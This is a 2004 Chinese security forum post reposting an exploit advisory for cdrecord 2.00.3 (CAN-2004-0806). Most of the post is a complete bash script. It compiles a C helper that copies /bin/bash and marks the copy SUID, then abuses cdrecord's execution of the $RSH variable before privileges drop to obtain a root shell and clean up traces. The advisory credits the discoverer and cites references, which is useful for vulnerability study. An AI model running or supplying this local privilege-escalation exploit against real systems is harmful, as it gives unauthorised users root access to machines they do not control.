‹‹ 上一主题 | 下一主题 ››
发新话题
打印

cdrecord $RSH exec() SUID Shell Creation

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6819 
精华
834 
积分
36070 
阅读权限
255 
性别
男 
来自
中国 
在线时间
586 小时 
注册时间
2004-6-25 
最后登录
2008-9-6 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-9-12 01:55  只看该作者

cdrecord $RSH exec() SUID Shell Creation

Computer Academic Underground
http://www.caughq.org
Exploit Code


===============/========================================================
Exploit ID: CAU-EX-2004-0002
Release Date: 09/09/2004
Title: cdrecord-suidshell.sh
Description: cdrecord $RSH exec() SUID Shell Creation
Tested: cdrecord 2.00.3
Attributes: Privileged Access
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2004-0002.txt
Author/Email: I)ruid <druid_at_caughq.org>
===============/========================================================


Description
===========


This shell script writes out and compiles a C application which sets
it&#39;s UID to it&#39;s EUID and copies a SUID shell to the current directory,
compiles it, then uses cdrecord&#39;s use of the $RSH environment variable
to execute it. It then cleans up it&#39;s mess and executes the shell for
convenience.



Notes
=====


This exploit is written assuming your target shell is bash.



Credits
=======
Max Vozeler is credited with discovering this vulnerability as stated
in the Mandrake Linux security advisory MDKSA-2004:091.



References
==========


http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0806
http://www.mandrakesecure.net/en/advisories/advisory.php?
  name=MDKSA-2004:091



Exploit
=======


#!/bin/bash


#
# cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
#
# Exploits cdrecord&#39;s exec() of $RSH before dropping privs
#


cat > ./cpbinbash.c << __EOF__
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>


main( int argc, char *argv[] ) {
      int fd1, fd2;
      int count;
      char buffer[1];


      /* Set ID&#39;s */
      setuid( geteuid() );
      setgid( geteuid() );


      /* Copy the shell */
      if ((fd1=open( "/bin/bash", O_RDONLY))<0)
           return -1;
      if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0)
           return -1;
      while((count=read(fd1, buffer, 1)))
           write(fd2, buffer, count);
      free(buffer);
      close( fd1 );
      close( fd2 );


      /* Priv the shell */
      chown( "./bash", geteuid(), geteuid() );
      chmod( "./bash", 3565 );
}
__EOF__


cc ./cpbinbash.c -o ./cpbinbash


# Set up environment
export RSHSAVE=$RSH
export RSH=./cpbinbash


# Sploit
cdrecord dev= REMOTE:CAU:1,0,0 -


# Cleanup
rm cpbinbash*
export RSH=$RSHSAVE
export RSHSAVE=


# Use our suid bash
./bash -p

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题